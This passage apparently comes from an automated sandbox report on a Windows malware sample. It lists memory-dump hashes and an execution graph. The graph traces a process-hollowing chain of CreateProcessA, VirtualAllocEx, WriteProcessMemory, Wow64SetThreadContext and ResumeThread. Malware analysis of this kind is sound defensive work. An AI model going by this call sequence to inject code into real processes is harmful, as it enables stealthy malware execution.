                                                                                                                                                    • Instruction Fuzzy Hash: 6C90023104560C8F4A502BD97809557775CA5545157840153A50D815156A5564145596
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$4'p$4'p$4'p$4'p$pp
                                                                                                                                                    • API String ID: 0-2991777393
                                                                                                                                                    • Opcode ID: 48adef2b701ac1f0a977226aa464afd0f82ccbf9448a8fb6d6ace4d5e146c9d2
                                                                                                                                                    • Instruction ID: 51bbb851bd687c5f25d36c55d1ede338545d90903d63d6bcc3c3f73b7ebb071e
                                                                                                                                                    • Opcode Fuzzy Hash: 48adef2b701ac1f0a977226aa464afd0f82ccbf9448a8fb6d6ace4d5e146c9d2
                                                                                                                                                    • Instruction Fuzzy Hash: 4ED17F32600214DFCB19CF58D854E9ABBB2FF88310F1584A9E509AB276CB32ED55DF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$(p$(p$(p$(p
                                                                                                                                                    • API String ID: 0-1887976078
                                                                                                                                                    • Opcode ID: 620e9ddf45b8b61b557165426dfeea2dcf424196f4d5a1dff102b75eee6b0140
                                                                                                                                                    • Instruction ID: 417b660ea951130f4e31079afe546d5cb458febdbbdb51723137245171534d81
                                                                                                                                                    • Opcode Fuzzy Hash: 620e9ddf45b8b61b557165426dfeea2dcf424196f4d5a1dff102b75eee6b0140
                                                                                                                                                    • Instruction Fuzzy Hash: 63C113323047519FCB19DB68E850AAF3BE2EFC5714B19446AE849CB3D6CE35DC0687A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $(p$@;R$XRp
                                                                                                                                                    • API String ID: 0-3658829951
                                                                                                                                                    • Opcode ID: d2c478b45bb21f2ffe81327e7596013ca5ad3527451068bff5a9f8b3a7e75467
                                                                                                                                                    • Instruction ID: 8d33cdf94a704aeebbac5e1ceffccb75aae9ad0bd63546540eff9a2ff9b89d53
                                                                                                                                                    • Opcode Fuzzy Hash: d2c478b45bb21f2ffe81327e7596013ca5ad3527451068bff5a9f8b3a7e75467
                                                                                                                                                    • Instruction Fuzzy Hash: C80239357405208FCB58DB28C899A6A77F2FF89711B2949A9E106CF3B5CB72DC42CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (_p$(_p$(_p$(_p
                                                                                                                                                    • API String ID: 0-1436489877
                                                                                                                                                    • Opcode ID: 1d8d68b0b6f9832c6ec5d2551c097d752dcb5a830c1a62d08a74f9798b31f798
                                                                                                                                                    • Instruction ID: 4538ffb75c660e90a29412b367de1e2f3371f4a07ad71cb74d87f5f28c5999d2
                                                                                                                                                    • Opcode Fuzzy Hash: 1d8d68b0b6f9832c6ec5d2551c097d752dcb5a830c1a62d08a74f9798b31f798
                                                                                                                                                    • Instruction Fuzzy Hash: 2361E474B043019FC7199B78D4655AEBFB2EF86300B2584BEE4069B7A2EB31DC42CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:7.5%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:153
                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                    execution_graph 61684 14d044 61685 14d05c 61684->61685 61686 14d0b7 61685->61686 61688 52ce1a0 61685->61688 61689 52ce1f9 61688->61689 61692 52ce730 61689->61692 61690 52ce22e 61693 52ce75d 61692->61693 61696 52ce8f3 61693->61696 61697 52cd5b8 61693->61697 61696->61690 61699 52cd5df 61697->61699 61701 52cdab8 61699->61701 61702 52cdb01 VirtualProtect 61701->61702 61704 52cd69c 61702->61704 61704->61690 61885 5fe528 61886 5fe542 61885->61886 61887 5fe552 61886->61887 61890 52c5c5e 61886->61890 61893 52c3c3a 61886->61893 61892 52cd5b8 VirtualProtect 61890->61892 61891 52c01cb 61892->61891 61895 52cd5b8 VirtualProtect 61893->61895 61894 52c3c58 61895->61894 61705 4d0753b 61706 4d07545 61705->61706 61710 20ffcea 61706->61710 61716 20ffcf8 61706->61716 61707 4d06ebf 61711 20ffd0d 61710->61711 61712 20ffd23 61711->61712 61722 21a0260 61711->61722 61726 21a0006 61711->61726 61730 21a0040 61711->61730 61712->61707 61717 20ffd0d 61716->61717 61718 20ffd23 61717->61718 61719 21a0260 10 API calls 61717->61719 61720 21a0040 10 API calls 61717->61720 61721 21a0006 10 API calls 61717->61721 61718->61707 61719->61718 61720->61718 61721->61718 61724 21a009d 61722->61724 61723 21a00af 61723->61712 61724->61723 61734 21a19da 61724->61734 61728 21a006a 61726->61728 61727 21a00af 61727->61712 61728->61727 61729 21a19da 10 API calls 61728->61729 61729->61728 61732 21a006a 61730->61732 61731 21a00af 61731->61712 61732->61731 61733 21a19da 10 API calls 61732->61733 61733->61732 61735 21a19fd 61734->61735 61738 21a1c7d 61735->61738 61739 21a2451 61738->61739 61740 21a1a98 61738->61740 61743 21a2798 61739->61743 61744 21a27ad 61743->61744 61758 21a2d7a 61744->61758 61762 21a2c44 61744->61762 61767 21a2ca7 61744->61767 61772 21a2df7 61744->61772 61777 21a34c7 61744->61777 61783 21a2d43 61744->61783 61788 21a3453 61744->61788 61793 21a322c 61744->61793 61798 21a2cac 61744->61798 61803 21a35af 61744->61803 61808 21a30c9 61744->61808 61812 21a2e2b 61744->61812 61745 21a2485 61759 21a314c 61758->61759 61760 21a2859 61758->61760 61816 21a9458 61759->61816 61763 21a2c53 61762->61763 61829 21a76b8 61763->61829 61833 21a76c0 61763->61833 61764 21a2c7d 61768 21a325e 61767->61768 61837 21a73f8 61768->61837 61841 21a7400 61768->61841 61769 21a3296 61773 21a37be 61772->61773 61775 21a76b8 WriteProcessMemory 61773->61775 61776 21a76c0 WriteProcessMemory 61773->61776 61774 21a2859 61774->61745 61775->61774 61776->61774 61778 21a3479 61777->61778 61780 21a2859 61777->61780 61845 21a7a58 61778->61845 61849 21a7a50 61778->61849 61779 21a34a8 61784 21a2d4d 61783->61784 61786 21a73f8 VirtualAllocEx 61784->61786 61787 21a7400 VirtualAllocEx 61784->61787 61785 21a3296 61786->61785 61787->61785 61789 21a345d 61788->61789 61791 21a7a58 ResumeThread 61789->61791 61792 21a7a50 ResumeThread 61789->61792 61790 21a34a8 61791->61790 61792->61790 61794 21a3237 61793->61794 61796 21a73f8 VirtualAllocEx 61794->61796 61797 21a7400 VirtualAllocEx 61794->61797 61795 21a3296 61796->61795 61797->61795 61799 21a37bf 61798->61799 61800 21a2859 61798->61800 61801 21a76b8 WriteProcessMemory 61799->61801 61802 21a76c0 WriteProcessMemory 61799->61802 61800->61745 61801->61800 61802->61800 61804 21a3798 61803->61804 61805 21a2859 61803->61805 61806 21a76b8 WriteProcessMemory 61804->61806 61807 21a76c0 WriteProcessMemory 61804->61807 61805->61745 61806->61805 61807->61805 61809 21a30e1 61808->61809 61853 21a3df8 61809->61853 61810 21a2859 61813 21a2e31 61812->61813 61876 21a93c8 61813->61876 61817 21a946d 61816->61817 61821 21a6d78 61817->61821 61825 21a6d80 61817->61825 61818 21a9486 61818->61760 61822 21a6dc9 Wow64SetThreadContext 61821->61822 61824 21a6e41 61822->61824 61824->61818 61826 21a6dc9 Wow64SetThreadContext 61825->61826 61828 21a6e41 61826->61828 61828->61818 61830 21a7709 WriteProcessMemory 61829->61830 61832 21a77a2 61830->61832 61832->61764 61834 21a7709 WriteProcessMemory 61833->61834 61836 21a77a2 61834->61836 61836->61764 61838 21a7444 VirtualAllocEx 61837->61838 61840 21a74bc 61838->61840 61840->61769 61842 21a7444 VirtualAllocEx 61841->61842 61844 21a74bc 61842->61844 61844->61769 61846 21a7a9c ResumeThread 61845->61846 61848 21a7ae8 61846->61848 61848->61779 61850 21a7a55 ResumeThread 61849->61850 61852 21a7ae8 61850->61852 61852->61779 61854 21a3e0f 61853->61854 61855 21a3e31 61854->61855 61858 21a422e 61854->61858 61863 21a41d5 61854->61863 61855->61810 61859 21a4253 61858->61859 61868 21a69d0 61859->61868 61872 21a69c5 61859->61872 61864 21a41de 61863->61864 61866 21a69d0 CreateProcessA 61864->61866 61867 21a69c5 CreateProcessA 61864->61867 61865 21a3ef1 61866->61865 61867->61865 61870 21a6a50 CreateProcessA 61868->61870 61871 21a6c4c 61870->61871 61874 21a6a50 CreateProcessA 61872->61874 61875 21a6c4c 61874->61875 61877 21a93dd 61876->61877 61879 21a76b8 WriteProcessMemory 61877->61879 61880 21a76c0 WriteProcessMemory 61877->61880 61878 21a2e71 61879->61878 61880->61878 61881 52cec80 61882 52cecc4 VirtualAlloc 61881->61882 61884 52ced31 61882->61884
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cd8127610cb297f2f7d25b342f01b80faed1830ee6d98fa81afb6536426a61ea
                                                                                                                                                    • Instruction ID: 030c8bd678dc81cbc809196f6711e6cb6f0c2a34e154a27bc72f05934e93983b
                                                                                                                                                    • Opcode Fuzzy Hash: cd8127610cb297f2f7d25b342f01b80faed1830ee6d98fa81afb6536426a61ea
                                                                                                                                                    • Instruction Fuzzy Hash: 2B815A35A50214DFCB45DFA8D894A6DBBB2FF89310B1580A9E9059B362CB30EC41DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bcfd96699ef62fc429ced85042a0d2726ded5fd2d71b9d3e3e075fe53ae7646c
                                                                                                                                                    • Instruction ID: df069944348b134923208f5f4f8cdcfed668ad0cfab615c7d294bb293ffea59d
                                                                                                                                                    • Opcode Fuzzy Hash: bcfd96699ef62fc429ced85042a0d2726ded5fd2d71b9d3e3e075fe53ae7646c
                                                                                                                                                    • Instruction Fuzzy Hash: 64713930B50214DFCB45DFA8D898A6DB7B6FF89700F1440A9E90A9B3A1CB34AC45DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3ba5aadaadfdc8e70471a50010964acd4cd0a4744892af6adef29c418763cc2f
                                                                                                                                                    • Instruction ID: 6f1b382b0d05d121949f2a7ef125b6ae9b650350a6d56e3d2c2bdbb53d495c55
                                                                                                                                                    • Opcode Fuzzy Hash: 3ba5aadaadfdc8e70471a50010964acd4cd0a4744892af6adef29c418763cc2f
                                                                                                                                                    • Instruction Fuzzy Hash: 8E21A870B00A19CFCB05EFA8D44446EB7B6FF89300B10456AD91697360EF74AA46CFA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.406985020.00000000020F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_20f0000_Kbojz.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9c3ce9de3b663e8dec096eb4c5d1d6e2ef0b5e4cf50817dda5fb856cbd464b08
                                                                                                                                                    • Instruction ID: 758579f32321b1c55df120e9c34b5e773a646c70b55392bb744bae63357dba35
                                                                                                                                                    • Opcode Fuzzy Hash: 9c3ce9de3b663e8dec096eb4c5d1d6e2ef0b5e4cf50817dda5fb856cbd464b08
                                                                                                                                                    • Instruction Fuzzy Hash: 67E0923884D3889FC741DF68C96416CBFF4EF46204F1480DEC984572A2D7325E46DB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%